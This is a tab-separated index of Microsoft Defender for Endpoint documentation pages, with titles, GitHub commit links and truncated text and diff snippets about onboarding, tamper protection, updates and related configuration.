security	Manage Gradual Rollout	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-gradual-rollout.md	For details on how to use these tools, see [Create a custom gradual rollout proc > - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md) > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) -> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md) +> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security	Manage Incidents	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-incidents.md	Added comments instantly appear on the pane. - [Incidents queue](/microsoft-365/security/defender-endpoint/view-incidents-queue) - [View and organize the Incidents queue](view-incidents-queue.md) - [Investigate incidents](investigate-incidents.md)
security	Manage Indicators	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-indicators.md	Customers may experience issues with alerts for Indicators of Compromise. The fo
security	Manage Mde Post Migration Configuration Manager	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-mde-post-migration-configuration-manager.md	If you haven't already done so, configure your Microsoft 365 Defender portal to ## Next steps - [Get an overview of Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
security	Manage Mde Post Migration Group Policy Objects	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-mde-post-migration-group-policy-objects.md	If you haven't already done so, configure your Microsoft 365 Defender portal to ## Next steps - [Get an overview of Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
security	Manage Mde Post Migration Intune	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-mde-post-migration-intune.md	If you haven't already done so, configure your Microsoft 365 Defender portal to - [Get an overview of Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
security	Manage Mde Post Migration Other Tools	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-mde-post-migration-other-tools.md	You can also configure whether and what features end users can see. ## Next steps - [Get an overview of Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
security	Manage Mde Post Migration	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-mde-post-migration.md	The following table lists various tools/methods you can use, with links to learn ## See also - [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md)
security	Manage Outdated Endpoints Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-outdated-endpoints-microsoft-defender-antivirus.md	See the following article for more information and allowed parameters: - [Manage event-based forced updates](manage-event-based-updates-microsoft-defender-antivirus.md) - [Manage updates for mobile devices and virtual machines (VMs)](manage-updates-mobile-devices-vms-microsoft-defender-antivirus.md) - [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security	Manage Protection Update Schedule Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-protection-update-schedule-microsoft-defender-antivirus.md	See the following for more information and allowed parameters: - [Manage event-based forced updates](manage-event-based-updates-microsoft-defender-antivirus.md) - [Manage updates for mobile devices and virtual machines (VMs)](manage-updates-mobile-devices-vms-microsoft-defender-antivirus.md) - [Microsoft Defender Antivirus in Windows 10 and 11](microsoft-defender-antivirus-in-windows-10.md)
security	Manage Protection Updates Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-protection-updates-microsoft-defender-antivirus.md	Set up a network file share (UNC/mapped drive) to download security intelligence - [Manage event-based forced updates](manage-event-based-updates-microsoft-defender-antivirus.md) - [Manage updates for mobile devices and VMs](manage-updates-mobile-devices-vms-microsoft-defender-antivirus.md) - [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security	Manage Security Policies	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-security-policies.md	During an investigation, you can also view the Security policies tab in the
security	Manage Suppression Rules	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-suppression-rules.md	You can view a list of all the suppression rules and manage them in one place. Y ## Related topics - [Manage alerts](manage-alerts.md)
security	Manage Tamper Protection Configuration Manager	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-tamper-protection-configuration-manager.md	Using Configuration Manager with tenant attach, you can turn tamper protection o - [Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml) - [Manage Microsoft Defender for Endpoint on devices with Microsoft Intune](/mem/intune/protect/mde-security-integration)
security	Manage Tamper Protection Individual Device	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-tamper-protection-individual-device.md	Here's what you see in the Windows Security app: [Protect security settings with tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) -[Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml) +[Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml)
security	Manage Tamper Protection Intune	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-tamper-protection-intune.md	You can use a registry key to determine whether the functionality to protect Mic - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos) - [Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml) - [Manage Microsoft Defender for Endpoint on devices with Microsoft Intune](/mem/intune/protect/mde-security-integration)
security	Manage Tamper Protection Microsoft 365 Defender	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-tamper-protection-microsoft-365-defender.md	search.appverid: met150 - [Built-in protection helps guard against ransomware](built-in-protection.md) - [What happens when tamper protection is turned on?](prevent-changes-to-security-settings-with-tamper-protection.md#what-happens-when-tamper-protection-is-turned-on) - [Protect macOS security settings with tamper protection](tamperprotection-macos.md)-- [Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml) +- [Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml)
security	Manage Updates Mobile Devices Vms Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-updates-mobile-devices-vms-microsoft-defender-antivirus.md	This action prevents protection updates from downloading when the PC is on batte ## Related articles - [Manage Microsoft Defender Antivirus updates and apply baselines](microsoft-defender-antivirus-updates.md)-- [Update and manage Microsoft Defender Antivirus in Windows 10](deploy-manage-report-microsoft-defender-antivirus.md) +- [Update and manage Microsoft Defender Antivirus in Windows 10](deploy-manage-report-microsoft-defender-antivirus.md)
security	Management Apis	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/management-apis.md	When you enable security information and event management (SIEM) integration, it - [Access the Microsoft Defender for Endpoint APIs](apis-intro.md) - [Supported APIs](exposed-apis-list.md) - [Technical partner opportunities](partner-integration.md)
security	Mde Device Control Device Installation	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mde-device-control-device-installation.md	DeviceRegistryEvents It is not enough to enable only a single hardware ID to enable a single USB thumb-drive. Ensure that all the USB devices that precede the target one aren't blocked (allowed) as well. :::image type="content" source="../../media/devicemgrscrnshot.png" alt-text="The Device install faq" lightbox="../../media/devicemgrscrnshot.png":::
security	Mde P1 Setup Configuration	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mde-p1-setup-configuration.md	To help with planning your WDAC deployment, see the following resources: Now that you have gone through the setup and configuration process, your next step is to get started using Defender for Endpoint. - [Get started with Defender for Endpoint Plan 1](mde-plan1-getting-started.md)
security	Mde Plan1 Getting Started	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mde-plan1-getting-started.md	Scroll down to see all the views in the Web protection report. Some views includ - [Manage Microsoft Defender for Endpoint Plan 1](manage-mde-post-migration.md) - [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md)
security	Mde Planning Guide	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mde-planning-guide.md	The following is a list of pre-requisites required to deploy Defender for Endpoi ## Next step Start your deployment with [Step 1 - Set up Microsoft Defender for Endpoint deployment](production-deployment.md)
security	Mde Sec Ops Guide	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mde-sec-ops-guide.md	The following articles provide guidance to troubleshoot and fix errors that you - [Troubleshoot attack surface reduction issues](troubleshoot-asr.md) - [Troubleshoot onboarding issues](troubleshoot-onboarding.md)
security	Microsoft Cloud App Security Config	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-cloud-app-security-config.md	If you're interested in trying Microsoft Defender for Cloud Apps, see [Microsoft ## Related topic - [Microsoft Defender for Cloud Apps integration](microsoft-cloud-app-security-integration.md)
security	Microsoft Cloud App Security Integration	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-cloud-app-security-integration.md	For more information about cloud discovery, see [Working with discovered apps](/ ## Related topic - [Configure Microsoft Defender for Cloud Apps integration](microsoft-cloud-app-security-config.md)
security	Microsoft Defender Antivirus Compatibility	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-compatibility.md	You might also use [limited periodic scanning](limited-periodic-scanning-microso - [Microsoft Defender Antivirus on Windows clients](microsoft-defender-antivirus-in-windows-10.md) - [EDR in block mode](edr-in-block-mode.md) - [Learn about Endpoint data loss prevention](/microsoft-365/compliance/endpoint-dlp-learn-about)
security	Microsoft Defender Antivirus On Windows Server	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-on-windows-server.md	If a non-Microsoft antivirus product was installed on Windows Server, Microsoft - [Microsoft Defender Antivirus in Windows](microsoft-defender-antivirus-windows.md) - [Microsoft Defender Antivirus compatibility with other security products](microsoft-defender-antivirus-compatibility.md) - [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)
security	Microsoft Defender Antivirus Updates	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-updates.md	For more information, see [Microsoft Defender update for Windows operating syste > - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security	Microsoft Defender Antivirus Windows	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows.md	It's important to keep Microsoft Defender Antivirus (or any antivirus/antimalwar - [Microsoft Defender Antivirus management and configuration](configuration-management-reference-microsoft-defender-antivirus.md) - [Evaluate Microsoft Defender Antivirus protection](evaluate-microsoft-defender-antivirus.md) - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security	Microsoft Defender Endpoint Android	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-android.md	Guidance on how to configure Microsoft Defender for Endpoint on Android features - [Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune](android-intune.md) - [Configure Microsoft Defender for Endpoint on Android features](android-configure.md) - [Mobile Application Management (MAM) basics](/mem/intune/apps/app-management#mobile-application-management-mam-basics)
security	Microsoft Defender Endpoint Antivirus Performance Mode	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-antivirus-performance-mode.md	Performance mode can only run on a trusted Dev Drive and is enabled by default ## See also [Set up a Dev Drive on Windows 11](/windows/dev-drive)
security	Microsoft Defender Endpoint Ios	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-ios.md	Deployment of Microsoft Defender for Endpoint on iOS can be done via Microsoft I - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md) - [Configure Conditional Access policy based on device risk score from Microsoft Defender for Endpoint](ios-configure-features.md#conditional-access-with-defender-for-endpoint-on-ios) - [Mobile Application Management (MAM) basics](/mem/intune/apps/app-management#mobile-application-management-mam-basics)
security	Microsoft Defender Endpoint Linux	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-linux.md	High I/O workloads from certain applications can experience performance issues w - [Protect your endpoints with Defender for Cloud's integrated EDR solution: Microsoft Defender for Endpoint](/azure/defender-for-cloud/integration-defender-for-endpoint) - [Connect your non-Azure machines to Microsoft Defender for Cloud](/azure/defender-for-cloud/quickstart-onboard-machines) - [Turn on network protection for Linux](network-protection-linux.md)
security	Microsoft Defender Endpoint Mac	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-mac.md	Starting with macOS 11 (Big Sur), Microsoft Defender for Endpoint has been fully - For more information about logging, uninstalling, or other topics, see [Resources for Microsoft Defender for Endpoint on Mac](mac-resources.md). - [Privacy for Microsoft Defender for Endpoint on Mac](mac-privacy.md). - [Turn on Network protection for macOS](network-protection-macos.md)
security	Microsoft Defender Endpoint	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint.md	Defender for Endpoint directly integrates with various Microsoft solutions, incl With Microsoft 365 Defender, Defender for Endpoint, and various Microsoft security solutions, form a unified pre- and post-breach enterprise defense suite that natively integrates across endpoint, identity, email, and applications to detect, prevent, investigate, and automatically respond to sophisticated attacks.
security	Microsoft Defender Offline	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-offline.md	To see the Microsoft Defender Offline scan results: - [Customize, initiate, and review the results of scans and remediation](customize-run-review-remediate-scans-microsoft-defender-antivirus.md) - [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security	Microsoft Defender Security Center Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-security-center-antivirus.md	To learn more, see the following resources: ## See also - [Microsoft Defender Antivirus](microsoft-defender-antivirus-in-windows-10.md)
security	Migrating Asr Rules	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/migrating-asr-rules.md	See also - [Attack surface reduction FAQ](attack-surface-reduction-faq.yml) - [Enable attack surface reduction rules](enable-attack-surface-reduction.md) - [Evaluate attack surface reduction rules](evaluate-attack-surface-reduction.md)
security	Migrating Mde Server To Cloud	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/migrating-mde-server-to-cloud.md	Once you've completed the relevant migration steps, Microsoft Defender for Cloud The extension acts as a management and deployment interface, which orchestrates and wraps the MDE installation scripts inside the operating system and reflect its provisioning state to the Azure management plane. The installation process recognizes an existing Defender for Endpoint installation and connects it to Defender for Cloud by automatically adding Defender for Endpoint service tags. In case you have Windows Server 2012 R2 or 2016 machines that are provisioned with the legacy, Log Analytics-based Microsoft Defender for Endpoint solution, Microsoft Defender for Cloud's deployment process deploys the Defender for Endpoint [unified solution](configure-server-endpoints.md#new-windows-server-2012-r2-and-2016-functionality-in-the-modern-unified-solution). After successful deployment, it will stop and disable the legacy Defender for Endpoint process on these machines.
security	Migration Guides	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/migration-guides.md	Let us know what you think! Submit your feedback at the bottom of the page. We'l - [Microsoft Defender for Endpoint](/windows/security/threat-protection) - [Microsoft Defender for Office 365](/microsoft-365/security/office-365-security/defender-for-office-365) - [Microsoft 365 Business Premium](../../business-premium/index.md)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md) +- [Microsoft Defender for Business](../defender-business/mdb-overview.md)
security	Minimum Requirements	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/minimum-requirements.md	If you're running a third-party antimalware client and use Mobile Device Managem - [Set up Microsoft Defender for Endpoint deployment](production-deployment.md) - [Onboard devices](onboard-configure.md)
security	Monthly Security Summary Report	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/monthly-security-summary-report.md	Shows the number of malicious URLs that were blocked by Microsoft Defender for E Track how many incidents and alerts were resolved in the past month using the incidents card. The card also shows all active incidents and alerts that require attention. You'll also be able to see a list of the top 10 severe incidents, their status, number of alerts, and the impacted devices and users. - +
security	Msda Updates Previous Versions Technical Upgrade Support	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/msda-updates-previous-versions-technical-upgrade-support.md	Microsoft regularly releases [security intelligence updates and product updates ### Known issues -- When this update is installed, the device needs the jump package 4.18.2001.10 to be able to update to the latest platform version. +- When this update is installed, the device needs the jump package 4.18.2001.10 to be able to update to the latest platform version.
security	Mssp Support	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mssp-support.md	Defender for Endpoint adds partnership opportunities for this scenario and allow
security	Mtd	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mtd.md	Need help in deploying or configuring Defender for Endpoint on Android & iOS? If - [Microsoft Defender for Endpoint on iOS](microsoft-defender-endpoint-ios.md) - Stay informed about upcoming releases by reading our [announcements](https://aka.ms/mdeblog).
security	Network Devices	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/network-devices.md	Change command-line settings on your device to allow copying and change text siz - [Device inventory](machines-view-overview.md) - [Windows authenticated scan](../defender-vulnerability-management/windows-authenticated-scan.md)
security	Network Protection Linux	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/network-protection-linux.md	Within 10-15 minutes, these domains will be listed in Microsoft 365 Defender und - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
security	Network Protection Macos	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/network-protection-macos.md	No End-user notification on third party browsers? Check your toast message setti - [Web content filtering](web-content-filtering.md)
security	Network Protection	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/network-protection.md	Network protection now has a performance optimization that allows Block mode to - [Configuring attack surface reduction capabilities in Microsoft Intune](/mem/intune/protect/endpoint-security-asr-policy) - [Network protection for Linux](network-protection-linux.md) \| To learn about using Microsoft Network protection for Linux devices. - [Network protection for macOS](network-protection-macos.md) \| To learn more about Microsoft Network protection for macOS
security	Next Generation Protection	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/next-generation-protection.md	If you're looking for antivirus-related information for other platforms, see one > See [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
security	Non Windows	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/non-windows.md	Recently announced capabilities of Microsoft Defender for Endpoint on Android an Defender for Endpoint on Linux is available through the Defender for Endpoint Server SKU that is available for both commercial and education customers. Please contact your account team or CSP for pricing and additional eligibility requirements.
security	Offboard Machine Api	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/offboard-machine-api.md	POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2 "Comment": "Offboard machine by automation" } ```
security	Offboard Machines	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/offboard-machines.md	Follow the corresponding instructions depending on your preferred deployment met ## Offboard non-Windows devices - [Offboard non-Windows devices](configure-endpoints-non-windows.md#offboard-non-windows-devices)
security	Office 365 Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/office-365-microsoft-defender-antivirus.md	Protection from ransomware is one great reason to put your files in OneDrive. An - [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md)
security	Onboard Configure	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboard-configure.md	Onboarding devices effectively enables the endpoint detection and response capab \| [Configure Microsoft Defender Experts capabilities](../defender/defender-experts-for-hunting.md) \| Microsoft Experts is a managed hunting service that provides Security Operation Centers (SOCs) with expert level monitoring and analysis to help them ensure that critical threats in their unique environments don't get missed.\|Not applicable\| For more information, see [Supported Microsoft Defender for Endpoint capabilities by platform](supported-capabilities-by-platform.md).
security	Onboard Downlevel	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboard-downlevel.md	You can use either of the following methods: # Reload the configuration and apply changes $AgentCfg.ReloadConfiguration() ```
security	Onboard Offline Machines	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboard-offline-machines.md	Depending on the operating system, the proxy to be used for Microsoft Defender f > [!NOTE] > Any client that has no access to the internet cannot be onboarded to Microsoft Defender Endpoint. A client must either have access to the required URLs directly, or it must have access via a proxy.
security	Onboard Windows Client	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboard-windows-client.md	In general, you'll identify the client you're onboarding, then follow the corres - [Onboard Windows devices using Microsoft Intune](configure-endpoints-mdm.md) - [Onboard Windows devices using Group Policy](configure-endpoints-gp.md) - [Onboard Windows devices using a local script](configure-endpoints-script.md)-- [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md) +- [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md)
security	Onboard Windows Multi Session Device	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboard-windows-multi-session-device.md	Licensing requirements for Microsoft Defender for Endpoint can be found at: [Lic [FSLogix anti-malware exclusions](/fslogix/overview-prerequisites#configure-antivirus-file-and-folder-exclusions) [Configure Microsoft Defender Antivirus on a remote desktop or virtual desktop infrastructure environment](/microsoft-365/security/defender-endpoint/deployment-vdi-microsoft-defender-antivirus)
security	Onboard Windows Server	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboard-windows-server.md	For other Windows server versions, you have two options to offboard Windows serv - [Onboard Windows devices using Microsoft Endpoint Configuration Manager](configure-endpoints-sccm.md) - [Onboard Windows devices using Group Policy](configure-endpoints-gp.md) - [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md)
security	Onboarding Endpoint Configuration Manager	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboarding-endpoint-configuration-manager.md	You have now successfully configured Controlled folder access in test mode. ## Related topic - [Onboarding using Microsoft Configuration Manager](onboarding-endpoint-manager.md)
security	Onboarding Endpoint Manager	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboarding-endpoint-manager.md	To confirm that the configuration policy has been applied to your test device, f 4. This should respond with a 1 as shown below. :::image type="content" source="images/c06fa3bbc2f70d59dfe1e106cd9a4683.png" alt-text="The command line-4" lightbox="images/c06fa3bbc2f70d59dfe1e106cd9a4683.png":::
security	Onboarding Notification	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboarding-notification.md	You can split it to two queries: 1. For offboarding take only this interval using the OData $filter and only notify if the conditions are met. 2. Take all devices last seen in the past hour and check first seen property for them (if the first seen property is on the past hour, the last seen must be there too).
security	Onboarding	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboarding.md	The example deployments will guide you on configuring some of the Defender for E After onboarding the endpoints move on to the next step where you'll configure the various capabilities such as endpoint detection and response, next-generation protection, and attack surface reduction. - [Step 5 - Configure capabilities](onboard-configure.md)
security	Overview Attack Surface Reduction	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/overview-attack-surface-reduction.md	As mentioned in the video, Defender for Endpoint includes several attack surface \| [Network protection](network-protection.md) \| Extend protection to your network traffic and connectivity on your organization's devices. (Requires Microsoft Defender Antivirus). \| \| [Test attack surface reduction (ASR) rules](attack-surface-reduction-rules-deployment-test.md) \| Provides steps to use audit mode to test attack surface reduction rules. \| \| [Web protection](web-protection-overview.md) \| Web protection lets you secure your devices against web threats and helps you regulate unwanted content. \|
security	Overview Client Analyzer	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/overview-client-analyzer.md	For more information about our privacy statement, see [Microsoft Privacy Stateme > [!NOTE] > On Windows devices, if you use Attack Surface Reduction (ASR) rule [Block process creations originating from PSExec and WMI commands](attack-surface-reduction-rules-reference.md#block-process-creations-originating-from-psexec-and-wmi-commands), then may want to temporarily disable the rule or [configure an exclusion to the ASR rule](enable-attack-surface-reduction.md#exclude-files-and-folders-from-asr-rules) to allow the analyzer to run connectivity checks to cloud as expected.
security	Overview Endpoint Detection Response	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/overview-endpoint-detection-response.md	The response capabilities give you the power to promptly remediate threats by ac - [Incidents queue](view-incidents-queue.md) - [Alerts queue](alerts-queue.md) - [Devices list](machines-view-overview.md)
security	Partner Applications	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/partner-applications.md	Defender for Endpoint currently supports IOC matching and remediation for file a ## Support for non-Windows platforms Defender for Endpoint provides a centralized security operations experience for Windows and non-Windows platforms, including mobile devices. You'll be able to see alerts from various supported operating systems (OS) in the portal and better protect your organization's network.
security	Partner Integration	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/partner-integration.md	Follow the steps in [Become a Microsoft Defender for Endpoint partner](get-start ## Related topic - [Overview of management and APIs](management-apis.md)
security	Post Ti Indicator	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/post-ti-indicator.md	POST https://api.securitycenter.microsoft.com/api/indicators ## Related topic - [Manage indicators](manage-indicators.md)
security	Preferences Setup	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/preferences-setup.md	APIs \| Enable the threat intel and SIEM integration. Rules \| Configure suppressions rules and automation settings. Device management \| Onboard and offboard devices. Network assessments \| Choose devices to be scanned regularly and added to the device inventory.
security	Prepare Deployment	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/prepare-deployment.md	The following example table serves to identify the Cyber Defense Operations Cent ## Next step After assigning roles and permissions to view and manage Defender for Endpoint it's time for [Step 3 - Identify your architecture and choose your deployment method](deployment-strategy.md).
security	Prevent Changes To Security Settings With Tamper Protection	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection.md	You can use Microsoft Intune and other methods to configure or manage tamper pro \|:\|:\| \| Use the [Microsoft 365 Defender portal](https://security.microsoft.com). \| Turn tamper protection on (or off), tenant wide. See [Manage tamper protection for your organization using Microsoft 365 Defender](manage-tamper-protection-microsoft-365-defender.md). <br/><br/>This method won't override settings that are managed in Microsoft Intune or Configuration Manager with tenant attach. \| \| Use the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431). \| Turn tamper protection on (or off), tenant wide, or apply tamper protection to some users/devices. You can exclude certain devices from tamper protection. See [Manage tamper protection for your organization using Intune](manage-tamper-protection-intune.md).<br/><br/>Protect Microsoft Defender Antivirus exclusions from tampering. See [Tamper protection for antivirus exclusions](manage-tamper-protection-intune.md#tamper-protection-for-antivirus-exclusions). \| -\| Use [Configuration Manager with tenant attach](manage-tamper-protection-configuration-manager.md). \| Turn tamper protection on (or off), tenant wide, or apply tamper protection to some users/devices. You can exclude certain devices from tamper protection. see [Manage tamper protection for your organization using tenant attach with Configuration Manager, version 2006](manage-tamper-protection-configuration-manager.md). \| +\| Use [Configuration Manager with tenant attach](manage-tamper-protection-configuration-manager.md). \| Turn tamper protection on (or off), tenant wide, or apply tamper protection to some users/devices. You can exclude certain devices from tamper protection. See [Manage tamper protection for your organization using tenant attach with Configuration Manager, version 2006](manage-tamper-protection-configuration-manager.md). \| \| Use the [Windows Security app](manage-tamper-protection-individual-device.md). \| Turn tamper protection on (or off) on an individual device that isn't managed by a security team (such as devices for home use). See [Manage tamper protection on an individual device](manage-tamper-protection-individual-device.md).<br/><br/>This method won't override tamper protection settings that are managed by the Microsoft 365 Defender portal, Intune, or Configuration Manager, and it isn't intended to be used by organizations. \| > [!TIP] To learn more about Microsoft Defender Vulnerability Management, see [Dashboard - [Built-in protection helps guard against ransomware](built-in-protection.md) - [Frequently asked questions on tamper protection](faqs-on-tamper-protection.yml) - [Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml)
